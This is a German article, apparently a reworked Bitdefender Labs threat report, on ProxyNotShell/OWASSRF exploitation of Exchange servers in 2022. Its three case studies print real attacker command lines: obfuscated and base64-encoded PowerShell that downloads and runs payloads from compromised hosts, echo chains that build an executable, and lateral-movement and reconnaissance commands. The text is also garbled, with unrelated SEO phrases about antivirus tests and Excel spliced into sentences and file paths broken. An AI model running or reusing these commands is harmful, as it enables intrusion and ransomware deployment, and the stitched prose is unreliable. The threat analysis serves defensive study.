In der digitalen Welt von 2022 sind Cyberbedrohungen allgegenwärtig und entwickeln sich ständig weiter. Für Unternehmen ist der Schutz ihrer IT-Infrastruktur essenziell, und ein umfassender Antivirensoftware Test 2022 muss daher weit über die Erkennung einfacher Malware hinausgehen. Er muss die Fähigkeit einer Sicherheitslösung bewerten, selbst gegen hochkomplexe Angriffe standzuhalten, die Schwachstellen in kritischen Systemen wie Microsoft Exchange ausnutzen. Ende November 2022 stellten Experten von Bitdefender Labs eine deutliche Zunahme solcher Attacken fest, die auf On-Premises Microsoft Exchange-Bereitstellungen abzielten, indem sie ProxyNotShell/OWASSRF-Exploit-Ketten nutzten. Diese Angriffe verdeutlichen, dass traditionelle Antivirenprodukte allein oft nicht ausreichen, um vor den raffinierten Taktiken heutiger Cyberkrimineller zu schützen. Server-Side Request Forgery (SSRF)-Angriffe auf Microsoft Exchange-Server gehören zu den am häufigsten genutzten Schwachstellen. Die hier präsentierten Erkenntnisse und Fallstudien bieten tiefe Einblicke in die Bedrohungslandschaft des Jahres 2022 und zeigen, welche Aspekte bei der Bewertung moderner Schutzlösungen entscheidend sind.
Die Bedrohungslandschaft 2022: Warum herkömmlicher Schutz nicht mehr ausreicht
Die Service-orientierte Architektur (SOA) hat sich über lange Zeit bewährt. Sie ist ein Software-Designansatz, der ein System als Sammlung von Diensten organisiert, die über klar definierte Schnittstellen miteinander kommunizieren. Die Hauptidee hinter SOA ist, die unabhängige Entwicklung und Wartung verschiedener Softwarekomponenten zu ermöglichen und diese in unterschiedlichen Kombinationen zur Erstellung neuer Systeme zu komponieren und wiederzuverwenden.
Ein Hauptvorteil von SOA ist die größere Flexibilität und Skalierbarkeit durch das Aufheben von Anwendungsgrenzen. Dieses Konzept führte jedoch auch zu neuen Sicherheitsherausforderungen, da Sicherheitsmodelle nicht länger fest in Anwendungen kodiert sind. Ein gängiger Ansatz ist es, nur wenige gehärtete Service-Endpunkte offenzulegen, die als Proxy für die anderen Dienste fungieren. Der Begriff „Endpunkt“ bezieht sich hier nicht auf einen physischen Endpunkt (wie Desktop oder Laptop), sondern auf einen netzwerkadressierbaren Endpunkt eines Dienstes, typischerweise eine URL, über die mit einer Dienstkomponente interagiert werden kann.
Grundlegende Implementierung eines Proxy-Service-Endpunkts, der eine Anfrage an den Backend-Dienst weiterleitet
Abb. 1 – Grundlegende Implementierung eines Proxy-Service-Endpunkts
Microsoft Exchange ist ein Beispiel für eine Anwendung, die Proxy-Dienste nutzt, um das sensible Backend vom unvertrauenswürdigen öffentlichen Netzwerk abzuschirmen. Über die Jahre entwickelte sich die Microsoft Exchange-Philosophie zu einem Prinzip der Co-Location – alle Exchange-Server (außer Edge-Transport-Server) sind Multi-Rollen-Server und verlassen sich auf die Trennung von Rollen. Die Client Access Services (CAS) bilden eine Schicht, die für die Annahme aller Arten von Client-Verbindungen (Frontend) und deren Weiterleitung an Backend-Dienste zuständig ist.
Abb. 2 – Hochrangiger Überblick über die Microsoft Exchange-Architektur
Da CAS- und Backend-Dienste auf demselben Exchange-Mailbox-Server gehostet werden, müssen Sicherheitskontrollen vorhanden sein. Backend-Dienste akzeptieren nur Anfragen mit einem gültigen Kerberos-Token von CAS. Selbst wenn eine direkte Verbindung zu ihnen hergestellt werden könnte, würden sie alle Verbindungen ablehnen, die nicht von einem der CAS-Dienste stammen. Hier zeigt sich, wie wichtig eine genaue Überprüfung ist, die in jedem guten antivirensoftware test 2022 beleuchtet werden sollte, um solche komplexen Interaktionen abzusichern.
Server-Side Request Forgery (SSRF) – Eine unterschätzte Gefahr
Wie bei vielen anderen “Secure by Design”-Architekturen wurden schnell neue Angriffstechniken entdeckt, um diese scheinbar sicheren Systeme anzugreifen. Server-Side Request Forgery (SSRF) ist eine Art von Angriff, die es einem Angreifer ermöglicht, eine manipulierte Anfrage von einem anfälligen Server im Namen des anfälligen Servers an einen anderen Server zu senden. Dies kann dem Angreifer den Zugriff auf Ressourcen oder Informationen ermöglichen, die ihm sonst nicht direkt zugänglich wären, und auch Aktionen im Namen des anfälligen Servers durchführen lassen.
Zum Beispiel könnte ein Angreifer, wenn eine Webanwendung anfällig für SSRF ist, eine Anfrage vom anfälligen Server an eine lokale Netzwerkressource senden, die normalerweise für den Angreifer nicht zugänglich ist, wie etwa eine Datenbank. Alternativ könnte der Angreifer eine Anfrage an einen externen Server, beispielsweise einen Cloud-Dienst, senden, um Aktionen im Namen des anfälligen Servers durchzuführen. Um einen SSRF-Angriff erfolgreich auszuführen, muss der Angreifer in der Lage sein, eine Anfrage vom anfälligen Server zu senden, und auch den Inhalt der Anfrage so manipulieren können, dass er die gewünschten Ressourcen zugreifen oder die gewünschten Aktionen ausführen kann.
Abb. 4 – Ein Beispiel für einen SSRF-Angriff, der einen Proxy-Service-Endpunkt ins Visier nimmt
Exchange Proxy-Angriffe: Evolution und Techniken (2021-2022)
Die meisten Schwachstellen, die von Sicherheitsforschern entdeckt werden, basieren auf fehlerhaften Implementierungen – zum Beispiel Speicherfehler oder Code-Injektionen. Es ist eher selten, Schwachstellen in der High-Level-Architektur zu finden. Architektur-Schwachstellen sind in Produktionssystemen schwer zu beheben, insbesondere bei weit verbreiteter Software, bei der Abwärtskompatibilität ein wichtiges Merkmal ist – wie bei Microsoft Exchange-Servern.
Anfang 2021 beschlossen die Sicherheitsforscher Orange Tsai und das DEVCORE Research Team, die CAS-Implementierung genauer unter die Lupe zu nehmen. Überraschenderweise entdeckten sie nicht nur mehrere kritische Schwachstellen, sondern identifizierten CAS auch als eine neue Angriffsfläche, die auf allen Microsoft Exchange-Servern seit Exchange 2013 vorhanden ist. Die CAS-Implementierung auf On-Premises Microsoft Exchange-Servern ist anfällig für SSRF-Angriffe. Und diese erste Entdeckung war nur die Spitze des Eisbergs.
Abb. 5 – Microsoft Exchange CAS ist anfällig für SSRF-Angriffe
SSRF-Angriffe sind typischerweise auf die Verletzung der Verfügbarkeit oder Vertraulichkeit beschränkt – zum Beispiel Denial of Service oder die Offenlegung sensibler Daten. Werden sie jedoch mit anderen Schwachstellen kombiniert, können sie Exploit-Ketten bilden, die zu Remote Code Execution (RCE) führen. Moderne Antivirensoftware Test 2022 Prüfungen müssen daher die Erkennung und Abwehr solcher Ketten umfassen.
Betrachten wir eine dieser Exploit-Ketten genauer, um besser zu verstehen, wie Exploits zusammenarbeiten. Wir verwenden ProxyShell als Beispiel, mit seiner Kombination aus drei verschiedenen Exploits. Der erste Exploit ist der bekannte SSRF-Angriff, der SYSTEM-Zugriff auf die Backend-Dienste gewährt. Da SYSTEM keine Mailboxen daran angehängt hat, nutzt der Bedrohungsakteur einen (De-)Eskalations-Exploit, um seinen/ihren Zugriff auf ein Domänenkonto “herunterzustufen”. Als Nächstes speichert der Bedrohungsakteur den Code der Web-Shell als E-Mail in der Mailbox-Datenbank. Mithilfe von PowerShell Remoting wird diese E-Mail dann mithilfe des New-MailBoxExportRequest-Cmdlets als .pst-Datei exportiert, jedoch mit der Erweiterung .aspx (die anfällige Version von Exchange validiert die Dateierweiterung nicht). Da die permutative Kodierung, die das PST-Dateiformat verwendet, gut dokumentiert ist, wird der verschlüsselte Web-Shell-Code in einem Format gespeichert, das während des Exportvorgangs automatisch entschlüsselt wird (clever!). Wenn man solche komplexen Mechanismen versteht, kann man auch besser einschätzen, welche Funktionen zum Beispiel bei einem excel windows server wichtig sind, um die Sicherheit zu gewährleisten.
Abb. 6 – ProxyShell Exploit-Kette
Microsoft Exchange ist aus verschiedenen Gründen ein ideales Ziel für diese Exploit-Ketten:
- Es gibt ein komplexes Netzwerk von Frontend- und Backend-Diensten mit Legacy-Code zur Gewährleistung der Abwärtskompatibilität (viele-zu-viele-Beziehungen).
- Backend-Dienste vertrauen den Anfragen von der Frontend-CAS-Schicht – im Falle eines SSRF-Angriffs wird ein gültiges Kerberos-Token von CAS generiert.
- Mehrere Backend-Dienste, die als Exchange Server selbst laufen (SYSTEM-Konto).
- Remote PowerShell (RPS) enthält Hunderte von PowerShell-Cmdlets.
In relativ kurzer Zeit wurden mehrere Kombinationen von Schwachstellen entdeckt:
- ProxyLogon – Die ursprüngliche Exploit-Kette war eine Kombination aus CVE-2021-26855 und CVE-2021-27065. Das Ergebnis war eine RCE-Kette, die keine Authentifizierung erforderte.
- ProxyShell – Die zweite Exploit-Kette war eine Kombination aus CVE-2021-34473, CVE-2021-34523 und CVE-2021-31207. Das Ergebnis war eine RCE-Kette, die keine Authentifizierung erforderte.
- ProxyNotShell – Diese Exploit-Kette war eine Kombination aus CVE-2022-41080 und CVE-2022-41082. Während diese RCE-Kette eine Authentifizierung erfordert, können beliebige gültige Anmeldeinformationen zur Eskalation des Zugriffs verwendet werden.
- OWASSRF – Zuerst von Crowdstrike gemeldet, verwendet diese Exploit-Kette dieselbe Kombination von Schwachstellen wie ProxyNotShell. Der Unterschied besteht darin, dass anstelle des Autodiscover-Dienstendpunkts der OWA-Dienstendpunkt vom CAS-Frontend verwendet wird. Durch das Ändern des vom SSRF-Angriff anvisierten Dienstendpunkts können Bedrohungsakteure die von Microsoft bereitgestellten Minderungshinweise umgehen.
Diese Liste der Exploit-Ketten ist keineswegs erschöpfend – es gibt weitere Ketten, die Autodiscover- und OWA-Dienste ausnutzen. Es überrascht nicht, dass diese Exchange-Schwachstellen sowohl in den “2021 Top Routinely Exploited Vulnerabilities” als auch in den “Top CVEs Actively Exploited by People’s Republic of China State-Sponsored Cyber Actors” (ab Oktober 2022) aufgeführt sind. Ein gründlicher Antivirensoftware Test 2022 muss daher auch die Abwehr solcher fortgeschrittenen, sich schnell entwickelnden Bedrohungen berücksichtigen.
Praxisfälle 2022: So sah die Bedrohung aus
In diesem Abschnitt werfen wir einen Blick auf einige reale Angriffe, die unsere Experten in den Bitdefender Labs entdeckt haben. Ende November 2022 stellten wir eine verstärkte Nutzung von ProxyNotShell/OWASSRF zur Ausführung bösartiger Befehle fest. Die Angriffsziele befanden sich hauptsächlich in den Vereinigten Staaten, aber auch Unternehmen aus Polen, Österreich, Kuwait und der Türkei waren betroffen. Die Branchen dieser Opfer waren Immobilien, Anwaltskanzleien, Fertigung, Beratung, Großhandel, Kunst & Unterhaltung, aber wie erwartet waren die meisten dieser Angriffe opportunistisch und nicht gezielt.
Fall 1 – Remote-Administrationstools
Im ersten Fall nutzten Bedrohungsakteure die ProxyNotShell-Exploit-Kette und versuchten, zwei verschiedene Remote-Access-Tools zu deployen. Das erste Tool war Meterpreter – eine Metasploit-Angriffsnutzlast, die eine interaktive Shell bereitstellt und mithilfe von In-Memory-DLL-Injektion eingesetzt wird –, das zweite war ConnectWise Control (ehemals ScreenConnect). Die Bedeutung einer robusten Verteidigung gegen solche Einschleusungsversuche ist ein Kernelement für jeden excel formel mwst berechnen oder anderen geschäftskritischen Prozess, der auf sicheren Systemen ausgeführt werden muss.
Beispiele für Befehlszeilen, die während dieses Angriffs erkannt (und blockiert) wurden:
| Befehle |
|---|
msiexec /q /i c:\windows\temp\c.msi powershell -nop -c $ds = 'D' + 'Own' + 'LOa' + 'DfI' + 'le'; Invoke-Expression (New-Object Net.WebClient).$ds.Invoke('https://autodiscover.hofd***[.]org/owa/auth/Current/themes/resources/6.css', 'c:\windows\temp\c.msi') |
rundll32 c:\windows\temp\l.ttf,guewik powershell -nop -c $ds = 'D' + 'Own' + 'LOa' + 'DfI' + 'le'; Invoke-Expression (New-Object Net.WebClient).$ds.Invoke('https://mail.fcp***[.]us/owa/auth/Current/themes/resources/ls.css', 'c:\windows\temp\l.ttf') |
msiexec /q /i c:\windows\temp\nn.msi powershell -nop -c Invoke-Expression (New-Object Net.WebClient).DownloadFile.Invoke('https://mail.fcp***[.]us/owa/auth/Current/themes/resources/a.css', 'c:\windows\temp\nn.msi') |
msiexec /q /i c:\windows\temp\ss.msi powershell -nop -c $ds = 'D' + 'Own' + 'LOa' + 'DfI' + 'le'; Invoke-Expression (New-Object Net.WebClient).$ds.Invoke('https://autodiscover.livi***.org/owa/auth/Current/themes/resources/ss.css', 'c:\windows\temp\ss.msi') |
powershell.exe -e cABvAHcAZQByAHMAaABlAGwAbAAgAC0AbgBvAHAAIAAtAGMAIABJAG4AdgBvAGsAZQAtAEUAeABwAHIAZQBzAHMAaQBvAG4AIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAuAEkAbgB2AG8AawBlACgAJwBoAHQAdABwAHMAOgAvAC8AYQB1AHQAbwBkAGkAcwBjAG8AdgBlAHIALgBoAG8A<redacted>AC8AbwB3AGEALwBhAHUAdABoAC8AQwB1AHIAcgBlAG4AdAAvAHQAaABlAG0AZQBzAC8AcgBlAHMAbwB1AHIAYwBlAHMALwA2AC4AYwBzAHMAJwAsACAAJwBjADoAXAB3AGkAbgBkAG8AdwBzAFwAdABlAG0AcABcAGMALgBtAHMAaQAnACkACgA= |
Powershell.exe -e bQBzAGkAZQB4AGUAYwAgAC8AcQAgAC8AaQAgAGMAOgBcAHcAaQBuAGQAbwB3AHMAXAB0AGUAbQBwAFwAYwAuAG0AcwBpAAoA |
powershell.exe -e dwBoAG8AYQBtAGkACgA= |
Die Angriffe wurden von den IP-Adressen 64.190.113[.]48 und 162.243.150[.]6 gestartet. Alle Staging-Server, von denen die Nutzlast heruntergeladen wurde, waren zuvor kompromittierte Microsoft Exchange-Server, höchstwahrscheinlich mit derselben Methode kompromittiert.
| URL | MD5 des heruntergeladenen Inhalts | Hinweise |
|---|---|---|
https://autodiscover.hofd***.org/owa/auth/Current/themes/resources/mb.css | d375f2fab8e85975cc19a60a6aebca94 | Downloader für Meterpreter mit C&C 162.243.150[.]6 |
https://autodiscover.hofd***.org/owa/auth/Current/themes/resources/6.css | 43250dd7f3a01c689131849c39f36482 | ConnectWise Control mit Relayserver 66.42.116[.]130:443 |
https://mail.fcp***[.]us/owa/auth/Current/themes/resources/ls.css | d765cf358376604b90eba4f5dccb4cea | Downloader für Meterpreter mit C&C 64.190.113[.]48 |
https://mail.fcp***[.]us/owa/auth/Current/themes/resources/a.css | 5d08e4593bc214dc4c86064fb8a1c776 | ConnectWise Control mit Relayserver 91.206.178[.]76:443 |
https://mail.fcp***[.]us/owa/auth/Current/themes/resources/b.css | 80ce2d5f2689a7c5ccf13843c962c6f1 | ConnectWise Control mit Relayserver 155.138.240[.]251:443 |
https://mail.st*********.org/owa/auth/Current/themes/resources/6.css | 43250dd7f3a01c689131849c39f36482 | ConnectWise Control mit Relayserver 66.42.116[.]130:443 |
https://autodiscover.livi***.org/owa/auth/Current/themes/resources/ss.css | a60f1c6e19d09661ca61502603ada352 | ConnectWise Control mit Relayserver 45.77.91[.]209:443 |
https://mail.o***.ca/owa/auth/Current/themes/resources/4.css | daf0b4b216ef9e046af3c863eea559a7 | ConnectWise Control mit Relayserver 45.77.146[.]144:443 |
https://mail.o***.ca/owa/auth/Current/themes/resources/mc.css | 8de8561f2440281155bbfe20666643fa | ConnectWise Control mit Relayserver 149.28.249[.]156:443 |
Alle URLs und Befehlszeilen wurden blockiert, und wir können nur vermuten, dass die Bereitstellung von Ransomware das wahrscheinlichste Ziel für die Bedrohungsakteure war.
Fall 2 – Initial Access Broker
Im zweiten Fall versuchten Bedrohungsakteure, mittels Web-Shells Persistenz auf dem kompromittierten System zu installieren. Eine Web-Shell ist ein bösartiges Programm (oder Skript), das auf einen Webserver hochgeladen wird, um unbefugten Zugriff auf den Server zu erlangen. Sobald die Web-Shell eingesetzt ist, ermöglicht sie einem Angreifer die Ausführung beliebiger Befehle oder Skripte und die Durchführung einer Vielzahl von Aktionen, wie das Hochladen zusätzlicher Malware, das Stehlen sensibler Daten oder das Starten von Angriffen auf andere Systeme.
Web-Shells werden häufig von Initial Access Brokern (IAB) verwendet. Ein Initial Access Broker ist eine Art Cyberkrimineller, der sich darauf spezialisiert hat, den initialen Zugriff auf das Netzwerk einer Zielorganisation zu erlangen. Sobald der initiale Zugriff erlangt wurde, kann der Access Broker den Zugriff auf das kompromittierte Netzwerk an andere kriminelle Gruppen verkaufen oder vermieten.
Schwachstellen wie Exchange-Proxy-Exploit-Ketten sind eine Goldgrube für Access Broker, da sie oft opportunistische Angriffe anstelle von gezielten bevorzugen. Mit dem Aufkommen von Ransomware-as-a-Service-Gruppen können Initial Access Broker eine stetige Versorgung mit potenziellen Ransomware-Zielen für Ransomware-Affiliates bereitstellen. Ein seriöser Antivirensoftware Test 2022 muss auch die Erkennung und Abwehr solcher IAB-Taktiken berücksichtigen.
Bei diesem Angriff werden mehrere Echo-Befehle miteinander verkettet, um eine ausführbare Base64-Datei auf einer Festplatte zu generieren. Dies zeigt, wie Angreifer kreative Wege finden, um Schutzmechanismen zu umgehen, ähnlich wie man mit excel cube funktionen komplexe Datenstrukturen manipulieren kann, wenn die zugrunde liegende Sicherheit unzureichend ist.
| Befehle |
|---|
cmd.exe /c echo TVqQAAMAAAAEAAAA//8AALgAAAAAAAAAQAAAAAAAAAAA...AIPCQIsIUWig0EAAUv/W5UUM>>&%TEMP%\\sMIod.b64 |
cmd.exe /c echo cwgj6CEtUgChGNBAAOKA8IsNENBAADtSfiuLVQyLDcjA...YGgslQAAUVDo14kAABhQaK+H>>&%TEMP%\\sMIod.b64 |
cmd.exe /c echo MACF1otNvItVuB9F3FGLTdhSi5V8//8fUIuFeIX//1GL...AACLkzQ9AJwr94uDVAgAIRvC>>&%TEMP%\\sMIod.b64 |
cmd.exe /c echo O7d/CnzBO89qBDPJXcCJThiJRhz/zEhOAAAqgyQISwA+...9nU0hf8udXIbtwAAQlOJdfzo>>&%TEMP%\\sMIod.b64 |
cmd.exe /c echo 7BUAAIt1CDP/hX7zAnVhixZqAWpragAGzfdMAAA9dhEj...UegZeQAAUP8VkMBqAF3CWJ07>>&%TEMP%\\sMIod.b64 |
cmd.exe /c echo kL+QMJCQkJCQkJCQkP0q7ItFEFaLdaNXNKgI3UgZi1AQ...lF7/dYPEwV3DkJCQkJCQkJCQ>>&%TEMP%\\sMIod.b64 |
cmd.exe /c echo kJCkkJDbVYvsg+xcK0UIU59XdSBXi30YPGNBHItNHI1F...AIPEkIXAddmLRZC7BAAUAFOD>>&%TEMP%\\sMIod.b64 |
cmd.exe /c echo wAhogDCtAFD/dgTBJO6DxAyFwHUOi00qJAbTAABmx0EM...PlKJRfzJiPjonfP//0J7SAEA>>&%TEMP%\\sMIod.b64 |
cmd.exe /c echo JFPozQMPADPJiUUIO8F0FYtDWFDo7/P/p4tFCJNcCovl...TIzNDU2Nzg5AAAAAAAAAAAA>>&%TEMP%\\sMIod.b64 |
cmd.exe /c echo AAAAAgAAAgAAAAAAAAAAAAAAAAAAAAAAAAEBAgEDAwMD...dGhhbiB0d2ljZSB0aGUgc3Rh>>&%TEMP%\\sMIod.b64 |
cmd.exe /c echo bmRhcmQKICAgICAgIGRldmlhdGlvbiBhcGFydC4gVGhl...aWxlICAgICAgRmlsZSBjb250>>&%TEMP%\\sMIod.b64 |
cmd.exe /c echo YWluaW5nIGRhdGEgdG8gUFVULiBSZW1lbWJlciBhbHNv...AAAAAAAAAAAAAAAAAAAAAAAA>>&%TEMP%\\sMIod.b64 |
cmd.exe /c echo AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA...AAAAAAAAAAAAAAAAAAAAAAAA>>&%TEMP%\\sMIod.b64 |
cmd.exe /c echo AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA...ZWxlYXNlXGFiLnBkYgA=>>&%TEMP%\\sMIod.b64 |
Die Echo-Kette wird auch verwendet, um eine VBScript-Datei am Speicherort %TEMP%qawWu.vbs zu generieren. Nach Ausführung dieser VBScript-Datei liest sie den Inhalt der Base64-Datei sMIod.b64, dekodiert ihren Inhalt und speichert ihn an einem neuen Speicherort %TEMP%ujjQl.exe. Nach dieser Operation wird die ausführbare Datei gestartet und beide Dateien sMIod.b64 und qawWu.vbs werden gelöscht.
Nachdem ujjQl.exe ausgeführt wurde, lädt diese bösartige ausführbare Datei eine weitere ausführbare Datei von http://mail.p***a.com/owa/auth/data.zip (MD5 ad362104eea7afcd727b77e89a4a5e2e) herunter. Als Ergebnis dieser Operation werden zwei .aspx-Dateien (Web-Shells) an folgenden Speicherorten erstellt:
%ExchangeInstallPath%FrontEndHttpProxyecpauthLogout.aspx(MD5ad086021b7ee50ff5b9acec4d79736be)%SystemDrive%inetpubwwwrootaspnet_clientsystem_web\iisstart.aspx(MD5607a6987395f02086e0e355c9ba4d76e)
Fall 3 – Cuba Ransomware
In diesem Fall nutzten Bedrohungsakteure die ProxyNotShell-Exploit-Kette, um PowerShell-Befehle auszuführen. Zunächst versuchten sie, die komar<xx>.dll</xx> herunterzuladen, die wir als Bughatch-Downloader identifizierten. Bughatch ist dafür bekannt, bei Cuba-Ransomware-Operationen eingesetzt zu werden, aber unsere Attribution basiert hauptsächlich auf vielen bekannten IOCs und wiederverwendeter Infrastruktur. Nachdem die Download-Befehle blockiert wurden, fuhren sie mit der unbeaufsichtigten (stillen) Installation des GoToAssist-Tools fort. GoToAssist ist eine legitime Remote-Support-Software von LogMeIn Inc.
| Ausgeführte Befehle |
|---|
c:\windows\system32\inetsrv\w3wp.exe -ap "MSExchangePowerShellAppPool" -v "v4.0" -c <redacted> |
powershell.exe (New-Object Net.WebClient).DownloadFile('https://lostbussiness[.]com:443/ga.exe', 'C:programdataga.exe') |
C:programdataga.exe |
powershell.exe (New-Object Net.WebClient).DownloadFile('https://devoterfo[.]com:443/komar66.dll', 'C:programdatakomar66.dll') |
rundll32.exe c:programdatakomar66.dll,?Show@CConfigDlg@@QEAAXXZ |
powershell.exe (New-Object Net.WebClient).DownloadFile('https://devoterfo[.]com:443/komar64.dll', 'C:windowstempkomar64.dll') |
RunDll32 C:windowstempkomar64.dll,ConvertPng |
powershell.exe (New-Object Net.WebClient).DownloadFile('https://devoterfo[.]com:443/ga.exe', 'C:programdataga.exe') |
C:programdataga.exe |
C:Program Files (x86)GoToAssist Remote Support Unattended1847923225473922339GoToAssistUnattended.exe |
powershell.exe (New-Object Net.WebClient).DownloadFile('https://devoterfo[.]com:443/addp.dll', 'C:programdataaddp.dll') |
RunDll32 C:programdataaddp.dll,Start |
Der nächste Schritt war die laterale Bewegung mittels GoToAssist. Diese Art der Netzwerkdurchdringung ist ein Alarmsignal, das ein guter schiffe versenken excel anleitung nicht lösen würde, aber eine fortschrittliche Antivirensoftware erkennen und unterbinden sollte.
| Befehle |
|---|
cmd.exe /C nltest /dclist: |
net group "Domain Admins" /domain |
ping |
ping <dc2> |
cmd.exe /C copy 23-145s.bat \<machine1>C$windowstemp</machine1> |
cmd.exe /C copy 23-145s.dll \<machine1>C$windowstemp</machine1> |
cmd.exe /C copy kk.dll \<machine1>C$windowstemp</machine1> |
cmd.exe /C copy komar65.dll \<machine2>C$windowstemp</machine2> |
cmd.exe /C copy kk65.bat \<machine2>C$windowstemp</machine2> |
cmd.exe /C copy rdp.bat \<machine3>C$windowstemp</machine3> |
Um den Zugriff aufrechtzuerhalten, erstellten die Bedrohungsakteure auch Benutzerkonten mit lokalen Administratorrechten. Sie versuchten, verschiedene Tools herunterzuladen, wobei einige Dateien über PowerShell und andere Dateien von den bereitgestellten Tools heruntergeladen wurden. Die Analyse der heruntergeladenen Tools:
| URL | MD5 der heruntergeladenen Binärdatei | Details |
|---|---|---|
https://devoterfo[.]com:443/komar66.dll | 53c2f5ebde7c5417b2b4081070643da1 | Lädt einen Shellcode von http://38.135.122[.]130/Agent64.bin herunter und führt ihn aus; interessanterweise gelingt der Download nur, wenn der User-Agent auf einen dieser beiden Werte eingestellt ist – „Mozilla/4.0“ und „Mozilla/5.0“; der 4.0 User-Agent wird vom Downloader verwendet und der 5.0 vom finalen Backdoor während des Update-Vorgangs; |
https://devoterfo[.]com:443/komar65.dll | 2c0584f95b33a77e20060cc569a5279a | Verhält sich wie komar66.dll |
https://devoterfo[.]com:443/komar64.dll | 617180092c3935de27dfff0090e5de70 | Verhält sich wie komar66.dll |
https://devoterfo[.]com:443/addp.dll | 43bc56681d4149001119ea87021ea52a | Erstellt den Benutzer SqlDbAdmin und fügt ihn den lokalen Gruppen Administratoren und Remote Desktop Users hinzu |
https://devoterfo[.]com:443/cps.exe | 5d700d932297094dda08a7398640cd24 |